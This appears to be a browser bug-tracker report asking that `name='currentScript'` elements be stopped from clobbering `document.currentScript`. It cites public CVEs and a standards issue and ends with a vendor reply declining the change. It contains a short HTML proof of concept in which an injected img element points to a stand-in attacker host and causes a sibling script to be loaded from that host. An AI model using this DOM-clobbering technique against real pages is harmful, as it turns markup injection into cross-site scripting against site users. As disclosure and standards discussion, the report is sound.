There is a relatively common source of CVEs that is being reported, e.g. - https://vulert.com/vuln-db/CVE-2024-45389 - https://github.com/advisories/GHSA-gcx4-mw62-g8wm - https://nvd.nist.gov/vuln/detail/CVE-2024-45812 - https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 based on a "DOM clobbering" technique, where if an attacker can inject a DOM element with a `name='currentScript'` attribute, and the page happens to read `document.currentScript.src` to decide what URL to load a sibling JS file, then an attacker can elevate their attack threat vector from DOM clobbering to a XSS scripting attack. I.e. ```html <html><body> <img name='currentScript' src='http://bad.attacker.site.com/foo.js'> <script> var script = document.createElement('script'); var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/')); script.src = `${scriptDir}/sibling.js`; </script></body></html> ``` will undesirably load `http://bad.attacker.site.com/sibling.js` instead of `/sibling.js` from the same server that the HTML site is served at. This is discussed in the WhatWG/HTML ticket at https://github.com/whatwg/html/issues/10687 where it is asked that browsers would blacklist the special `name="currentScript"` attribute from clobbering `document.currentScript`. A WPT test is added at https://github.com/web-platform-tests/wpt/pull/48536 . Would Apple agree to enforce this security restriction and +1 the proposal at https://github.com/whatwg/html/issues/10687 ? (this is a security problem, but not marking it hidden since there are already so many public CVEs that have been reported and the issue is known for at least since 2016)
<rdar://problem/138025273>
This has been interoperable browser behavior for years, and I don't think we can change that.